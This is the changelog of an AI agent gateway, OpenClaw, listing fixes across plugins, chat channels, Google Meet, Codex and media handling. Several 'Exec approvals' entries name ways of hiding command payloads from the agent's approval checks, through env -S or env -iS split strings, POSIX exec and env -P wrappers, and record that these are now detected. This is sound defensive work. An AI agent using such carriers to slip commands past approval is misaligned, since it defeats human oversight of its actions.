<li>Plugins/providers: make bundled provider discovery honor restrictive <code>plugins.allow</code> by default for new configs, while doctor migrates legacy restrictive allowlist configs to <code>plugins.bundledDiscovery: "compat"</code> to preserve upgrade behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dougbtv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dougbtv">@dougbtv</a>.</li>
<li>Control UI/Talk: make failed Talk startup errors dismissable and clear the stale Talk error state when dismissed, so missing realtime voice provider configuration does not leave a permanent chat banner. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373812807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77071/hovercard" href="https://github.com/openclaw/openclaw/issues/77071">#77071</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ijoshdavis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ijoshdavis">@ijoshdavis</a>.</li>
<li>Control UI/Talk: stop and clear failed realtime Talk sessions when dismissing runtime error banners, so the next Talk click starts a fresh session instead of only stopping the stale one. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Control UI/Talk: retry from a failed realtime Talk session on the next Talk click instead of requiring a separate stale-session stop click first. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Canvas host: preserve the Gateway TLS scheme in browser canvas host URLs and startup mount logs, so direct HTTPS gateways do not advertise insecure canvas links. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>WhatsApp/login: route login success and failure messages through the injected runtime, so setup/onboarding surfaces capture all login output instead of only the QR. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Chat: create an isolated Google auth transport per auth client, so google-auth-library interceptor mutations do not accumulate across webhook verification and access-token clients. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/plugins: remove orphaned or recovered managed npm copies of bundled <code>@openclaw/*</code> plugins during <code>doctor --fix</code>, so stale package manifests cannot shadow the current bundled plugin config schema.</li>
<li>Control UI/performance: cap long-task and long-animation-frame diagnostics in the shared event log, so slow-render telemetry does not evict gateway/plugin events from the Debug and Overview views. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/startup: log the canvas host mount only after the HTTP server has bound, so startup logs no longer report the canvas host as mounted before it can serve requests.</li>
<li>Control UI/i18n: render the Sessions active filter tooltip with the configured minute count in every locale and make the i18n check reject placeholder drift. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Web fetch: late-bind <code>web_fetch</code> config and provider fallback metadata from the active runtime snapshot, matching <code>web_search</code> so long-lived tools do not use stale fetch provider settings. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord: clear stale startup probe bot/application status when the async bot probe throws, not just when it returns a degraded probe result. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Web search: scope explicit bundled <code>web_search</code> provider runtime loading through manifest ownership, so selecting DuckDuckGo/Gemini/etc. does not import unrelated bundled providers or log their optional dependency failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/discovery: demote the source-only TypeScript runtime check on already-installed <code>origin: "global"</code> plugin packages from a config-blocking error to a warning and let the runtime fall through to the TypeScript source via jiti, so a single broken installed package no longer blocks <code>plugins install</code> for unrelated plugins; install-time rejection of newly-installed source-only packages is unchanged. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>Providers/OpenAI Codex: stop the OAuth progress spinner before showing the manual redirect paste prompt, so callback timeouts do not spam <code>Browser callback did not finish</code> across terminals.</li>
<li>Providers/OpenAI Codex: fail closed on malformed <code>/codex</code> control commands and diagnostics confirmations before changing bindings, permissions, model overrides, active turns, or feedback uploads. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/OpenAI Codex: sanitize Codex app-server command readouts, failure replies, approval prompts, elicitation prompts, and <code>request_user_input</code> text before posting them back into chat. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/OpenAI Codex: preserve local bound-turn image paths, reject stale same-thread turn notifications, enforce option-only user input prompts, and return failed dynamic tool results to Codex as unsuccessful tool calls. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/DeepSeek: expose DeepSeek V4 <code>xhigh</code> and <code>max</code> thinking levels through the lightweight provider-policy surface, so Control UI <code>/think</code> pickers keep showing the max reasoning options when the runtime plugin registry is not active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4374344456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77139" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77139/hovercard" href="https://github.com/openclaw/openclaw/issues/77139">#77139</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</li>
<li>Release/beta smoke: resolve the dispatched Telegram beta E2E run from <code>gh run list</code> when <code>gh workflow run</code> returns no run URL, so the maintainer helper does not fail immediately after dispatch. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Media/images: keep HEIC/HEIF attachments fail-closed when optional Sharp conversion is unavailable instead of sending originals that still need conversion. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet: fork the caller's current agent transcript into agent-mode meeting consultant sessions, so Meet replies inherit the context from the tool call that joined the meeting.</li>
<li>iOS/mobile pairing: reject non-loopback <code>ws://</code> setup URLs before QR/setup-code issuance and let the iOS Gateway settings screen scan QR codes or paste full setup-code messages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI: keep Gateway Access inputs and locale picker contained inside the card at narrow and tablet widths.</li>
<li>Agents/trajectory: bound runtime trajectory capture and yield queued sidecar writes so oversized traces stop recording instead of monopolizing Gateway cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4374205763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77124" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77124/hovercard" href="https://github.com/openclaw/openclaw/issues/77124">#77124</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loyur/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loyur">@loyur</a>.</li>
<li>Telegram/streaming: sanitize tool-progress draft preview backticks before shared compaction, so long backtick-heavy progress text still renders inside the safe code-formatted preview instead of collapsing to an ellipsis.</li>
<li>UI/chat: remove the unsupported <code>line-clamp</code> declaration from the chat queue text rule to eliminate Firefox console noise without changing visible truncation behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ZanderH-code/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ZanderH-code">@ZanderH-code</a>.</li>
<li>Control UI: add explicit feedback for repeated actions by announcing session switches, flashing the active session selector, showing inline Save/Apply/Update progress, and distinguishing filtered-empty session lists from genuinely empty session stores. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Agents/Pi: suppress persistence for synthetic mid-turn overflow continuation prompts, so transcript-retry recovery does not write the "continue from transcript" prompt as a new user turn. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/tools: strip reasoning text from visible rich presentation titles, blocks, buttons, and select labels before message-tool sends, so structured channel payloads cannot leak hidden planning. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Telegram: keep reply-dispatch lazy provider runtime chunks behind stable dist names and delete <code>/reasoning stream</code> previews after final delivery so package updates and live reasoning drafts do not leave Telegram turns broken or noisy. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Discord: start the gateway monitor without waiting for the startup bot/application probe, so WSL2 hosts with a slow <code>/users/@me</code> REST path still bring the channel online while status enrichment finishes asynchronously. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373996492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77103" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77103/hovercard" href="https://github.com/openclaw/openclaw/issues/77103">#77103</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Suited78/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Suited78">@Suited78</a>.</li>
<li>Exec approvals: detect <code>env -S</code> split-string command-carrier risks when <code>-S</code>/<code>-s</code> is combined with other env short options, so approval explanations do not miss split payloads hidden behind <code>env -iS...</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet: log the concrete agent-mode TTS provider, model, voice, output format, and sample rate after speech synthesis, so Meet logs show which voice backend spoke each reply.</li>
<li>Voice Call: mark realtime calls completed when the realtime provider closes normally, so Twilio/OpenAI/Google realtime stop events do not leave active call records behind. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/update: keep the shutdown close path behind a stable runtime chunk and ship compatibility aliases for recent <code>server-close-*</code> hashes, so manual npm package replacement cannot leave an already-running Gateway unable to shut down cleanly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373865331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77087/hovercard" href="https://github.com/openclaw/openclaw/issues/77087">#77087</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/westlife219/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/westlife219">@westlife219</a>.</li>
<li>Control UI/media: mint short-lived scoped tickets for assistant media fetches and render ticketed URLs instead of exposing long-lived auth tokens in chat image URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319425097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70830" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70830/hovercard" href="https://github.com/openclaw/openclaw/issues/70830">#70830</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373888329" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77097" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77097/hovercard" href="https://github.com/openclaw/openclaw/issues/77097">#77097</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Exec approvals: treat POSIX <code>exec</code> as a command carrier for inline eval, shell-wrapper, and eval/source detection, so approval explanations and command-risk checks do not miss payloads hidden behind <code>exec</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet: log the resolved audio provider model when starting Chrome and paired-node Meet talk-back bridges, so agent-mode joins show the STT model and bidi joins show the realtime voice model.</li>
<li>Diagnostics: handle missing session-tail files in cron recovery context without tripping extension test typecheck. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QA/Slack: update the Slack dispatch preview fallback test SDK mock for structured progress draft helpers, so the rich progress draft regression suite covers the new imports instead of failing before assertions run. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Release validation: allow focused QA live reruns to select Matrix and Telegram without running Slack, so known Slack credential-pool outages do not block non-Slack live proof. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/loader: keep bundled plugin package <code>test-api.js</code> aliases behind private QA mode, so source transforms do not expose test-only public surfaces during normal plugin loading. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/startup: start cron and record the post-ready memory trace even when deferred maintenance timers fail after readiness, so a non-fatal timer setup issue does not silently leave scheduled jobs idle. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Exec approvals: unwrap BSD/macOS <code>env -P &lt;path&gt;</code> carrier commands before approval-command and strict inline-eval checks, so <code>/approve</code> shell execution and inline interpreter payloads are still blocked behind that env form.</li>
<li>Agents/session status: keep semantic <code>session_status({ sessionKey: "current" })</code> on the live run session even before that run has a persisted session-store entry, instead of falling back to the sandbox policy key. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QA/Slack: resolve bundled official plugin public-surface package aliases during source-mode QA runs, so release Slack live validation can load <code>@openclaw/slack/api.js</code> without workspace symlinks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex: pass the live run session key into app-server dynamic tools when sandbox policy uses a separate session key, so <code>session_status({ sessionKey: "current" })</code> reports the active run instead of the sandbox policy key. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Web search: keep first-class assistant <code>web_search</code> auto-detect and configured runtime providers visible when active runtime metadata or the active plugin registry is incomplete. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373814331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77073" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77073/hovercard" href="https://github.com/openclaw/openclaw/issues/77073">#77073</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeykrug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeykrug">@joeykrug</a>.</li>
<li>Plugins/tools: mark manifest-optional sibling tools as optional even when they come from a shared non-optional factory, so cached/status/MCP metadata keeps opt-in tool policy accurate. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Matrix: keep <code>streaming.progress.toolProgress</code> scoped to progress draft mode, so partial and quiet Matrix previews do not lose tool progress unless <code>streaming.preview.toolProgress</code> is disabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/validation: isolate gateway server validation files, ignore unrelated startup logs in request-trace coverage, and fail fast on stuck shared-auth sockets, reducing false main-branch CI failures for contributors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Channels/streaming: keep <code>streaming.progress.toolProgress</code> scoped to progress draft mode, so disabling compact progress lines does not silence partial/block preview tool updates. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/update: treat OpenClaw stable correction versions like <code>2026.5.3-1</code> as stable releases for npm installs, plugin updates, and bundled-version comparisons, so <code>latest</code> can advance official plugins without prerelease opt-in. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Control UI: point the Appearance tweakcn browse action and docs at the live tweakcn editor route instead of the removed <code>/themes</code> page. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373717554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77048" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77048/hovercard" href="https://github.com/openclaw/openclaw/issues/77048">#77048</a>.</li>
<li>Control UI: render Dream Diary prose through the sanitized markdown pipeline, so diary bold/italic/header markdown no longer appears as literal source text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216740824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62413" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62413/hovercard" href="https://github.com/openclaw/openclaw/issues/62413">#62413</a>.</li>
<li>Control UI: render tool results whose output arrives as text-block arrays and give expanded tool output a scrollable block, so read/exec output remains visible in WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373739359" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77054/hovercard" href="https://github.com/openclaw/openclaw/issues/77054">#77054</a>.</li>
<li>MCP: include serialized conversation/message payloads in the primary text content for <code>conversations_list</code> and <code>messages_read</code>, while preserving <code>structuredContent</code> for capable clients. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373517492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77024" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77024/hovercard" href="https://github.com/openclaw/openclaw/issues/77024">#77024</a>.</li>
<li>Media: treat <code>EPERM</code> from the post-write media fsync step as best-effort, allowing WebChat and channel uploads to finish on Windows filesystems that reject <code>fsync</code> after a successful write. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372472680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76844" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76844/hovercard" href="https://github.com/openclaw/openclaw/issues/76844">#76844</a>.</li>
<li>Media/Telegram: send in-limit original images when optional image optimization is unavailable, so Telegram MEDIA replies and message-tool image sends do not fail just because <code>sharp</code> is missing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373855031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77081" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77081/hovercard" href="https://github.com/openclaw/openclaw/issues/77081">#77081</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4374137500" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77117" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77117/hovercard" href="https://github.com/openclaw/openclaw/pull/77117">#77117</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pfrederiksen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pfrederiksen">@pfrederiksen</a>.</li>
<li>Diagnostics: include last progress, cron job/run ids, stopped cron job name, and the last assistant transcript snippet in stalled-session and stuck-session recovery logs so cron stalls show what was stopped.</li>
<li>Streaming channels: add <code>streaming.preview.commandText: "status"</code> / <code>streaming.progress.commandText: "status"</code> to hide command/exec text in preview progress lines while keeping the released raw command text default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373812831" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77072" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77072/hovercard" href="https://github.com/openclaw/openclaw/issues/77072">#77072</a>.</li>
<li>Agents/cron: let explicit cron <code>timeoutSeconds</code> drive both CLI no-output and embedded LLM idle watchdogs instead of being capped by resume defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370262867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76289" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76289/hovercard" href="https://github.com/openclaw/openclaw/issues/76289">#76289</a>.</li>
<li>Plugins/catalog: suppress missing <code>channelConfigs</code> compatibility diagnostics for external channel plugins that are disabled, denied, or outside a restrictive allowlist. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369072769" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76095/hovercard" href="https://github.com/openclaw/openclaw/issues/76095">#76095</a>.</li>
<li>Diagnostics: keep webhook/message OTEL attributes and Prometheus delivery labels low-cardinality and omit raw chat/message IDs from spans, so progress-draft and message-tool modes do not leak high-cardinality messaging identifiers.</li>
<li>Google Meet: stop advertising legacy <code>mode: "realtime"</code> to agents and config UIs, while keeping it as a hidden compatibility alias for <code>mode: "agent"</code>, so new joins use the STT -&gt; OpenClaw agent -&gt; TTS path instead of selecting the direct realtime voice fallback.</li>
<li>Google Meet: add <code>chrome.audioBufferBytes</code> for generated command-pair SoX audio commands and lower the default buffer from SoX's 8192 bytes to 4096 bytes to reduce Chrome talk-back latency.</li>
<li>Google Meet: split realtime provider config into agent-mode transcription and bidi-mode voice providers, and migrate legacy Gemini Live bidi configs with <code>doctor --fix</code>, so Gemini Live can back direct bidi fallback without breaking the default OpenClaw agent talk-back path.</li>
<li>Google Meet: keep waiting for the Meet microphone to unmute during join intro readiness instead of permanently skipping talk-back when Meet briefly reports the local mic as muted.</li>
<li>Google Meet: expose <code>voiceCall.postDtmfSpeechDelayMs</code> in the plugin manifest schema and setup hints, so manifest-based config editing accepts the runtime-supported Twilio delay key. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet: keep explicit non-Google <code>realtime.provider</code> values as the transcription provider compatibility fallback when <code>realtime.transcriptionProvider</code> is unset. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Google Meet: make Twilio setup status require an enabled <code>voice-call</code> plugin entry instead of treating a missing entry as ready. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Telegram: render shared interactive reply buttons in reply delivery so plugin approval messages show inline keyboards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369897432" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76238" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76238/hovercard" href="https://github.com/openclaw/openclaw/pull/76238">#76238</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keshavbotagent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keshavbotagent">@keshavbotagent</a>.</li>
<li>Cron/sessions: keep cron metadata rows without an on-disk transcript non-resumable until a transcript exists, so doctor and <code>sessions cleanup --fix-missing</code> no longer report or prune pre-transcript cron rows as broken sessions. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373427724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77011" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77011/hovercard" href="https://github.com/openclaw/openclaw/issues/77011">#77011</a>.</li>
<li>Agents/cli-runner: drop a saved <code>claude-cli</code> resume sessionId at preparation time when its on-disk transcript no longer exists in <code>~/.claude/projects/</code>, so a stale binding from a half-installed <code>update.run</code> cannot trap follow-up runs (auto-reply / Telegram direct) in a <code>claude --resume</code> timeout loop; the run starts fresh and the new sessionId is written back through the existing post-run flow. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373541733" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77030" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77030/hovercard" href="https://github.com/openclaw/openclaw/pull/77030">#77030</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373427724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77011" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/77011/hovercard" href="https://github.com/openclaw/openclaw/issues/77011">#77011</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
